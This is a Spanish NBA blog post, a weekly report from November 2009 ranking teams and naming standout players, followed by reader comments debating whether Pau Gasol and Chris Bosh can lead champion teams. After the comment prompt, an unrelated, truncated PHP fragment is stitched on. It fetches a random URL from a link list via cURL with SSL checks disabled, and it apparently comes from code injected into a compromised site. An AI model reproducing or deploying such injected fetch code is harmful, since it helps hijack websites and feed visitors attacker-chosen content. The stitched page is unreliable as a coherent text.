Informe Semanal #4

23 de November de 2009 por txusma

¿Por qué todos los jugones sonríen igual?

Sonrisa de oreja a oreja es la que se te debe de quedar cuando acabas la semana con un 0 en el casillero de derrotas, producto de un trabajo bien hecho como el que han llevado a cabo Lakers, Magic, Jazz y Mavericks, cada uno liderado por un auténtico jugón.

En los Lakers, la vuelta de Pau Gasol ha supuesto el retorno a los viejos hábitos, con el español ordenando desde la zona, Kobe realizando menos esfuerzos en ataque y guardándose para lo que está por venir (y para regalarnos cosas como ésta), Odom viendo cómo ha de asumir menos responsabilidad, lo que le libera enormemente, y Bynum concentrándose en la defensa y en no caer lesionado. Resultado: 3 victorias tras esas derrotas consecutivas que les ensombreció el ánimo.

3 victorias son también las que han conseguido en Dallas y en Utah. Los de Nowitzki encadenan 5 victorias consecutivas liderados, magistralmente, por el alemán, que está a un nivel nunca visto, incluso superior al de la temporada del MVP. Y los Jazz entran en récord positivo por primera vez esta temporada. Kirilenko resurge por momentos y la pareja de rookies Matthews-Maynor que se han sacado de la chistera han demostrado que tienen nivel para ser importantes en esta liga.

El único equipo que consigue 4 victorias esta semana es Orlando, incluida una contra los grandes rivales del Este, los Celtics. Parece que los Magic empiezan a reencontrar sensaciones después de recuperar a Rashard Lewis y a pesar de la lesión de Nelson.

La vida puede ser maravillosa

A la octava fue la vencida y los sorprendentes líderes de la conferencia Este, los Atlanta Hawks, dieron su brazo a torcer frente los New Orleans Hornets. De todas maneras, fue necesaria la lesión de Mike Bibby (que no es muy grave) para que los de la ciudad de la Coca-Cola bajaran el pistón. Vaya temporada están haciendo.

Precisamente los Hornets es otro de los equipos que han acabado la semana en positivo. Se ha ido Byron Scott y se ha lesionado Chris Paul… Cada cual que extraiga sus propias conclusiones pero lo que es cierto es que su pareja de rookies (Collison-Thorton) está a un nivel destacadísimo.

Los Bucks no quieren dejar de soñar y ya son terceros del Este. Lo de Jennings es incalificable y sólo hay que esperar que el retorno de Redd les haga mejorar…  si el propio Redd quiere, claro. Memphis y New York también aparecen por aquí gracias a sus dos victorias semanales y porque los de la Gran Manzana perdieron ayer en la prórroga con los Celtics, que si no se van a un peldaño más arriba.

Boston, Denver (a pesar de la derrota frente los Clippers), Cleveland y Phoenix también han realizado una buena semana.

Ganarás el pan con el sudor de tu frente

¿Qué haría Adelman si dispusiera de las plantillas de los Thunder o los Blazers, por ejemplo? No lo sabemos pero lo cierto es que Houston, Oklahoma City y Portland acaban la semana con 2 partidos ganados y 2 perdidos. En Houston ya hacen suficiente (ojo con los rumores de desavenencias graves entre McGrady y la franquicia), los Thunder están en fase de consolidación (y están en Playoffs) y meterse ahora con los Blazers sería algo ventajista después de ser el mejor equipo de la pasada semana.

Se dejaban llevar

En Philadelphia y Toronto no acaban de encontrar las claves que les den más victorias de las que figuran en su casillero y eso que por ejemplo Elton Brand parece que mejora. En los Raptors, Calderón o no parece estar en su mejor momento o le ha afectado realmente la llegada del point-forward Turkoglu. La cuestión es que está lejos de su mejor nivel.

Por su parte San Antonio sigue al tran-tran y ya está fuera de Playoffs. Algo parecido sucedió el año pasado y al final ya vimos como acabaron, pero tanto ir el cántaro a la fuente… Los Bulls se enfrentaban a una difícil semana y perdieron con dos de los mejores equipos del Oeste, Lakers y Nuggets. Se lo podemos perdonar pero que no se acostumbren.

Heat, Pacers, Bobcats, Warriors, Clippers, Kings tampoco pueden alegrarse de cómo les ha ido la semana.

El Carabasas Club

Wolves y Nets continúan su batalla por discernir quién es el peor equipo de la competición. De momento, ventaja para los de New Jersey (13 derrotas y sumando) pero que no se nos despisten en Minnesota, que vuelve Devin Harris.

Para hacerles compañía en el pozo, los Pistons han sumado 4 derrotas esta semana y ya suman 5 consecutivas. El siguiente partido es frente a Cleveland, así que pueden extender la mala racha. Las bajas de Hamilton y Prince se notan en demasía.

PREMIOS SEMANALES

¿Qué has hecho tú que no hayamos hecho los demás?

Pues lo que ha hecho Dirk Nowitzki que no hemos hecho el resto del planeta ha sido liderar a su equipo hasta la cabeza de la Southwest con 30 puntos por partido, casi 10 rebotes y 3 asistencias. Tan letal como siempre en las situaciones límite.

Algo similar ha logrado Brandon Jennings, también llevando a su equipo a lo más alto en victorias/derrotas de la Central. Más de 25 puntos por partido (entre los 10 primeros anotadores de la liga), 4 rebotes y 6 asistencias. Sobresaliente. La categoría “rookie” se le queda pequeña.

Al salir de clase

Jennings lo tiene hecho este mes para ser elegido brillantemente como mejor rookie. Más allá de su alargada sombra solemos destacar a Tyreke Evans. También podemos hacerlo, por fin, con James Harden, pese a su desastrosa actuación de anoche, y además debemos hablar obligatoriamente de la nueva sensación de los Hornets, Darren Collison. Que lo disfrute mientras vuelve CP3.

La vida puede ser maravillosa

Además de la recuperación de los célebres guarismos de Elton Brand, la sorpresa más agradable de la semana ha sido la actuación de la dupla Thornton-Collison para los Hornets, coincidiendo con el mejor momento del equipo cuando peor pinta tenían.

Cortocircuitos S.L.

A pesar de una amable semana en lo colectivo y una más que digna actuación anoche contra los Celtics, no podemos evitar destacar la empanada mental que lleva Nate Robinson este curso, encabezando el enésimo fracaso deportivo de los Knicks e ilustrada por el triple que anotó el otra día en su propia canasta. Broncazo más que justo le dio D’Antoni. Está él como para ir haciendo el payaso. Ni puñetera gracia.

Comenta

14 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    A Nate Robinson lo que le pasa es que es malísimo, lo único que sabe hacer es brincar y poner gestos.

      Citar

  2. Kantonyo dice:
    #2

    Un dato a destacar es el partido que ha jugado el “español” Serge Ibaka, 11 puntos 13 rebotes y 5 tapones en el Staples Center, no está nada mal…

    Yo creo que cualidades físicas tiene para hacer cosas interesantes.

      Citar

  3. Love Denise dice:
    #3

    viendo el raptors-magic, confirmo ideas que tenía desde la pretemporada.

    respecto a los raptors:
    1- 50 kilos por 5 años son demasiado para turkoglu, y más cuando tieen como 30 tacos, dentro de 3 años, será el tipico jugador que cobra un pastizal jugando bien 1 de cada 20 partidos y convirtiendose en un lastre para la economía del club
    2- bosh es un gran jugador, pero le pasa como a pau, no vale para estrella de un equipo nba medianamente bueno, ahora, como 2º estrella sería la caña, por so, si yo fuera él, intentaría juntarme con algún Lebron o con algún Wade.
    3- calderón se está acomodando, quizás sea por la falta de competencia, pero, últiammaente no defiende un huevo, los bases rivales le hacen un traje (como ej, chalmers 30 ptos, j-will 16), se le ve apagado, dejándose llevar, y encima fallando tiros libres.

    sobre magic:
    1- es la mejor plantilla (me refiero a la suma de 12 tios) de la NBA, otra cosa, es que después los 6 jugadores buenos de Lakers, Celtics y Cavs, se basten para ganarles en play-offs.
    2- es un delito que carter tire 24 veces (9/24) teniendo alrededor a gente como howard, lewis, pietrus, redick, etc. en los últimos 2 games, 19/53 en tiros de campo. Van Gundy debería llamarle la atención.
    3- por que no juega brandon bass? ese tio es un crack.

      Citar

  4. TheDeerHunter dice:
    #4

    Con Turkoglu se juntó el hambre con las ganas de comer. Por un lado, sus últimas campañas sí podrían bien justificar un contrato aproximado a lo que firmó, aunque está el handicap de la edad, como bien mencionas… y después está Collangelo, que se moría por sus huesitos. Yo también opino que el contrato está sobre pagado uno de esos años por 10 kilos, como mínimo, además de demostrarse que su presencia no es perfectamente compatible con lo que había (lease Calderón)
    Toronto puede tener muchos problemas, pero creo que ninguno de ellos es Bosh. Como tampoco ninguno de los problemas de Memphis eran Pau Gasol. Más bien sí creo que es una majadería juntar a Bosh con un center como Bargnani, por muy bien que lo esté haciendo este año.
    Acerca de Calderón, es evidente que no está bien. No sé si es que no termina de recuperar el tono físico para defender… pero le está faltando agresividad a ambos lados de la pista. No me atrevería a decir que se trata del club de “se dejaba llevar” aunque su nómina invite a hacerlo. Desde luego Turkoglu no le beneficia, pero su mentalidad de hombre de club no le va a permitir justificar 10 millones de dólares, ni mucho menos alcanzar el all-star.

    Sobre los Magic. Van Gundy está bajo sospecha… pero Dwight Howard también. No termina de gustarme la actitud de este último en todo este asunto. Supongo que el técnico debería llamar la atención a Carter de lo que dices pero, ¿porqué la estrella del equipo se queda cómodamente a la sombra en todo este asunto?
    Con respecto a Bass… menudo chafón. Lewis y Ryan Anderson están por delante de él en la rotación. Es lo que tiene tener a Lewis. Es un jugador que condiciona los sistemas… tanto los de los rivales como los propios.

      Citar

  5. Love Denise dice:
    #5

    ok deerhunter,
    en el tema bosh, ni mucho menos pienso que es un problema, lo que quiero decir es que no vale para liderar un buen equipo, como sí hicieron Nowitzki, Duncan, y por supuesto Garnett (en Celtics y por supuesto con los Wolves, a pesar de los compañeros que tenía). Es mi opinión, pero para mí ni Bosh ni Pau, ni por ejemplo también David West, pueden ser los jugadores franquicias de un equipo que aspire a ganar el anillo, ahora, como ya dije antes, como 2º estrella de un equipo son la bomba,
    Si quieres te lo expreso de otra forma, ya no se podrá comprobar, pero creo que si pones a Pau o Bosh en lugar de Duncan, los Spurs no habrían ganado 3 anillos, quizás 1 o ninguno. Aunque quizás es una tontería pensar esto, puesto que no se puede demostrar, pero es mi opinión.

    Saludos.

      Citar

  6. TheDeerHunter dice:
    #6

    Pero es que es lo que digo siempre cuando el personal critica a Pau Gasol.
    El baremo para medir a un jugador jamás puede ser otro del que sale 1 como él cada 100 años de baloncesto.
    Comparativamente con Duncan casi ningún jugador es líder ni jugador franquicia.
    Y no me parece ni de lejos un defecto el no ser tan bueno como Duncan.

    Quítate esa idea de la cabeza, Denise.

      Citar

  7. Love Denise dice:
    #7

    @deerhunter: esto no es ninguna crítica a gasol, es más, nunca vas a leer una crítica a Gasol por parte de mí, porque es un pedazo de jugador, y creo que ni tu ni yo, ni nuestros hijos, verá a un jugador español más bueno que Pau. Con todo esto, sólo te he querido expresar que Bosh y Pau SON MUYYYYY BUENOS, pero no son los jugadores idóneos para liderar una franquicia ganadora, son jugadores muy válidos y muy buenos para apoyar a la estrella de un equipo, o en su defecto, para liderar una franquicia de “mitad de tabla” (como Bosh en raptors, y Pau en Memphis). Quizás no comprendas lo que quiero decir, porque no me exprese bien, porque por escrito, los mensajes pueden distosionarse, etc, pero te aseguro que ni mucho menos critico a Bosh o a Pau.

      Citar

  8. TheDeerHunter dice:
    #8

    Sí, lo entiendo. Tampoco lo he tomado como una crítica propiamente dicha.
    En realidad, no sé si te contestaba a ti específicamente o entraba en generalización de ese tipo de comentarios.
    Me reafirmo en lo dicho. Pau sí ha demostrado que puede liderar un grupo competitivo como la selección.
    Además, creo que los Grizzlies llegaron a jugar bastante bien con él de líder (que fue poco más de una temporada, en realidad) Si en lugar de haber tenido alrededor el equipo que tuvo hubiera tenido un equipo competitivo creo que hubiera podido llegar muy lejos. Por supuesto sin garantías de lograr lo que ha logrado Duncan… o Garnett.
    Hay quien cree que es tan bueno como ellos. E incluso hay gente que ha llegado a machacarlo por no serlo. Yo no creo que lo sea… pero por supuesto que le veo como jugador franquicia que tendría opciones de quedar campeón liderando un buen equipo. Igual que Bosh.
    Quizás tengamos posibilidad todavía de comprobarlo.

      Citar

  9. Love Denise dice:
    #9

    ok deerhunter,

    si, quizás lo comprobemos este año si Bryant se lesionase (que no lo deseo)
    Hablando de los Grizzlies de Pau, tenían buen equipo, no para ganar la NBA, pero sí para ganar algun partido en primera ronda, y aquello acabó en 0 de 12 en 3 años. Por supuesto que no fue culpa de Pau, pero sí había un buen equipo (Battier, Posey, Mike Miller, J-Will, Eddie Jones, Atkins, etc ), a lo mejor, con un pivot duro tipo Perkins, o Dampier en sus buenos años, podían haber hecho algo más.

      Citar

  10. TheDeerHunter dice:
    #10

    Por dios, por supuesto que espero no comprobarlo con Pau… para mí ya está un poco por encima del bien y del mal de ese tipo de comentarios. Más si gana algún que otro anillo más y alguna que otra aparición en el AS.
    Quizás pueda ser más fácil comprobar el asunto con Bosh, que por cierto, es quien ha originado el debate.

    El tema Grizzlies hay que recordarlo con exáctitud, para centrar el debate.
    La mejor temporada fue la 2005-06 con un 49-33. 4ºs del oeste, pero 3ºs de la southwest… sólo por detrás de Spurs (63-19), Mavs(60-22) y Suns(54-28) < -ojito... sólo 5 victorias menos que un equipazo como los Suns) Por desgracia, que la Southwest fuera tan sumamente cañera provocó que un equipo como los Nuggets, con 5 victorias de ellos quedara por delante de ellos, como también de los Mavs. Lo mismo pasó con respecto a los Suns. De premio por quedar 3ºs del oeste les tocó jugar primera ronda contra el 2º equipo del oeste, con desventaja campo. El 2º mejor equipo de la NBA, más bien. Y nada de J-Will... Gasol se enfrentó a los Mavs finalistas de Nowizki, con Eddie Jones arrastrándose de 2º espada, Chucky Atkins, Mike Miller (flojísimo), Bobby Jackson arrastrándose, Lorenzen Wright arrastrándose y Shane Battier y Hakim Warrick demasiado verdes. Ni siquiera un mal Chocolate Blanco para llevarse a la boca o un Posey. Era un equipo literalmente de mierda. En frente tenían al mejor Nowitzki, al mejor Terry, al mejor Stackhouse de 6º, los prometedores Devin Harris, Josh Howard a Marquis Daniels... y a Dampier. Ni punto de comparación... y estuvieron a punto de ganarles en el 3º de la serie. No voy a mencionar los números de Gasol. Fueron cojonudos y punto. El resto de años fue peor... porque se enfrentaron por dos veces a los Spurs supercampeones. Con incluso peor equipo que el que he mencionado. De ahí no se puede concluir que un jugador no pueda ser capaz de liderar a un equipo ganador, porque aquel no lo era... y aún ganó lo suyo. Más que los Clippers que llegaron de milagro a semifinales, por ejemplo. Y más que aquellos Lakers...

      Citar

  • Viva_Dirk dice:
    #11

    Estoy mas cerca de la opinión de Denise que de la de Deer respecto al nivel de Gasol. Aunque no creo que halla nada que achacarle a Pau en los Grizzlies, cuando realmente dispusieron de un gran chocolate blanco, Brown seguia repartiendo los minutos como en la regular season y eso machacaba al equipo.

      Citar

  • sergio dice:
    #12

    Pues yo estoy mas cerca de la posicion de Deer que la de Denise. Se me ocurren varios equipos campeones que no han tenido una superestrella del tipo Duncan, Bryant, O’neal, Jordan, Bird o Magic. Yo no tengo muchas dudas de que un equipo como los Detroit que ganaron la liga hace unos años (puedo añadir los Seattle de la 78-79, o los Bullets o Portland de años anteriores), sumandole a Pau por Rasheed, hubiese tenido las mismas posibilidades, si no mas, de hacerse con el titulo. Ahora si, ni Jayson Williams, Mike Miller, James Posey, Bonzi Wells, Lorenzen Wright y Swift eran, ni son, Ben Wallace, Billups, Hamilton, Prince, Williamson o Mehmet Okur. Los jugadores de los Memphis de ese año han demostrado que son unos grandes jugadores como 6º hombre (Posey en Boston, Miller en Washington o Williams en Orlando).

    Quizas tengais toda la razon en que Pau no llegara a ser uno de los 10 mejores jugadores de la decada, ni falta que le hace. Aunque quizas con un par de anillos mas empiece la gente a verlo de otra manera. Pau ha cumplido de alero, de ala-pivot y de pivot, asumiendo en muchas ocasiones responsabilidades de lider y cumpliendolas, cosas que no se puede decir exactamente de sus compañeros. Si en vez de mejorar a sus compañeros en Memphis, acabo juntandose con el jugador con mas talento de la liga, pues oye, dos finales seguidas. Ser el escudero de uno de los 15 mejores de la historia de la liga no me parece algo a lo que haya llegado Bosh, por ejemplo. Ya me gustaria a mi pasar a la posteridad como el Pippen, Robinson, Worthy, McHale, Havlicek, Drexler, Parish,… de la estrellita de turno… o no??

    O si no, que alguien me diga mas de 15 jugadores que hayan aportado mas a la liga que Gasol desde que este entro en la NBA.

      Citar

  • Viva_Dirk dice:
    #13

    Primero con la lista que pides, que me gustan esas cosas, jeje: Duncan, Kobe, Shaq, Garnett, Pierce, Allen, Nowitzki, Wade, Billups, Nash y Kidd. A esos los veo fijos por delante de Gasol en eso que preguntas, y luego vendria el grupo en el que estaria Gasol, para mi encabezado por Lebron o Tony Parker, que son dos jugadores que personalmente me gustan mucho menos que Gasol.

    Y claro hablas de cambiar a Pau por Sheed y tener los mismos resultados, igual si o igual no vete a saber, pero estoy deacuerdo en que a Gasol hay que meterlo en un grupo mas parecido al de la carrera que ha tenido Sheed que a la que ha tenido Duncan.

      Citar

  • sergio dice:
    #14

    Que conste que me has dado solo 11… y yo a Billups no lo metia con todo el pesar de mi corazon. Y a Pierce… porque ha tirado de Boston estos años me merece mucho mas respeto. Aparte de que yo en el saco de Duncan no meteria a mas de 3 jugadores desde que se retiro Jordan: Kobe, Shaq y Garnett. Un minimo escalon por debajo: Nash y Nowitzki.

      Citar

  • Deja un comentario

    html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>